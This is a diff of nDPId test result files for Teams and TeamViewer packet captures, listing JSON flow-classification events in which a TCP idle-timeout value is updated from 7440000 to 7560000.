00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1587041693597,"flow_last_seen":1587041695591,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":272,"flow_tot_l4_payload_len":1414,"flow_avg_l4_payload_len":202,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.141","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1587041693515,"flow_last_seen":1587041693640,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":408,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50016,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 
@@ -579,20 +579,20 @@ 00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041693668,"flow_last_seen":1587041697714,"flow_idle_time":180000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":953,"flow_avg_l4_payload_len":158,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.137","src_port":50037,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}} 00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041695421,"flow_last_seen":1587041695433,"flow_idle_time":180000,"flow_min_l4_payload_len":100,"flow_max_l4_payload_len":124,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"52.114.252.21","dst_ip":"192.168.1.6","src_port":3480,"dst_port":50036,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.SkypeCall","breed":"Acceptable","category":"VoIP"}} 
00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687370,"flow_last_seen":1587041687435,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":263,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":54069,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1587041676612,"flow_last_seen":1587041676808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8429,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1587041685251,"flow_last_seen":1587041685681,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10159,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} -00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1587041676612,"flow_last_seen":1587041676808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8429,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.5","src_port":60534,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1587041685251,"flow_last_seen":1587041685681,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10159,"flow_avg_l4_payload_len":376,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041686889,"flow_last_seen":1587041687253,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10175,"flow_avg_l4_payload_len":391,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.67","src_port":60560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1090,"flow_tot_l4_payload_len":1126,"flow_avg_l4_payload_len":281,"midstream":1,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685171,"flow_last_seen":1587041685185,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":230,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":58457,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}} 
-00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041690916,"flow_last_seen":1587041691089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041697061,"flow_last_seen":1587041697244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8968,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041690916,"flow_last_seen":1587041691089,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8952,"flow_avg_l4_payload_len":426,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1587041697061,"flow_last_seen":1587041697244,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":8968,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.79.138.41","src_port":60568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041687731,"flow_last_seen":1587041687745,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":231,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} 
00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041675997,"flow_last_seen":1587041676010,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":67,"flow_tot_l4_payload_len":118,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60813,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041691075,"flow_last_seen":1587041691148,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":62863,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041694221,"flow_last_seen":1587041694234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":192,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":60837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1587041687436,"flow_last_seen":1587041687725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9349,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"104.40.187.151","src_port":60562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Azure","breed":"Acceptable","category":"Cloud"}} 
00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685093,"flow_last_seen":1587041685127,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":50653,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","packets-captured":2817,"packets-processed":2775,"total-skipped-flows":0,"total-l4-data-len":1327851,"total-not-detected-flows":1,"total-guessed-flows":4,"total-detected-flows":78,"total-detection-updates":50,"total-updates":0,"current-active-flows":0,"total-active-flows":83,"total-idle-flows":83,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":597,"global_ts_msec":1587041698021} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ diff --git a/test/results/teamviewer.pcap.out b/test/results/teamviewer.pcap.out index d7e8e6991..58dfae90b 100644 --- a/test/results/teamviewer.pcap.out +++ b/test/results/teamviewer.pcap.out 
@@ -1,9 +1,9 @@ 00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"teamviewer.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":330297,"flow_last_seen":330297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":330297,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":330297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":330297,"pkt":"UlQAEjUCCAAns+YuCABFAAA8OlxAAEAGTq0KAAIPovoCqouUFzIpaMgpAAAAAKAC+vCAjgAAAgQFtAQCCAosLVpIAAAAAAEDAwc="} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":330433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":330433,"pkt":"CAAns+YuUlQAEjUCCABFAAAsCdUAAEAGv0Si+gKqCgACDxcyi5QCaioBKWjIKmAS\/\/8lnwAAAgQFtA=="} 
-00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":330434,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":330434,"pkt":"UlQAEjUCCAAns+YuCABFAAAoOl1AAEAGTsAKAAIPovoCqouUFzIpaMgqAmoqAlAQ+vBCawAAAAAAAAAA"} -00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":330297,"flow_last_seen":330434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":330434,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} +00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":330297,"flow_last_seen":330297,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":330297,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":330297,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":330297,"pkt":"UlQAEjUCCAAns+YuCABFAAA8OlxAAEAGTq0KAAIPovoCqouUFzIpaMgpAAAAAKAC+vCAjgAAAgQFtAQCCAosLVpIAAAAAAEDAwc="} +00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":330433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":330433,"pkt":"CAAns+YuUlQAEjUCCABFAAAsCdUAAEAGv0Si+gKqCgACDxcyi5QCaioBKWjIKmAS\/\/8lnwAAAgQFtA=="} +00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":330434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":330434,"pkt":"UlQAEjUCCAAns+YuCABFAAAoOl1AAEAGTsAKAAIPovoCqouUFzIpaMgqAmoqAlAQ+vBCawAAAAAAAAAA"} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":330297,"flow_last_seen":330434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":330434,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"162.250.2.170","src_port":35732,"dst_port":5938,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TeamViewer","breed":"Acceptable","category":"RemoteAccess"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":238,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":520136,"flow_last_seen":520136,"flow_idle_time":180000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":520136,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"93.47.224.241","src_port":34417,"dst_port":36037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00554{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":238,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":520136,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":520136,"pkt":"UlQAEjUCCAAns+YuCABFAAB8z5cAAEARYKoKAAIPXS\/g8YZxjMUAaPehAAAAAAAAAAAAAAMXJEdQAAUAAAAAAAAAAAAAADkzLjQ3LjIyNC4yNDEAAADFjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":239,"source":"teamviewer.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":520148,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":138,"pkt_l4_len":104,"thread_ts_msec":520148,"pkt":"CAAns+YuUlQAEjUCCABFAAB8FPQAAEARG05dL+DxCgACD4zFhnEAaPihAAAAAAAAAAAAAAMXJEdQAAUAAAAAAAAAAAAAADkzLjQ3LjIyNC4yNDEAAADEjAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 
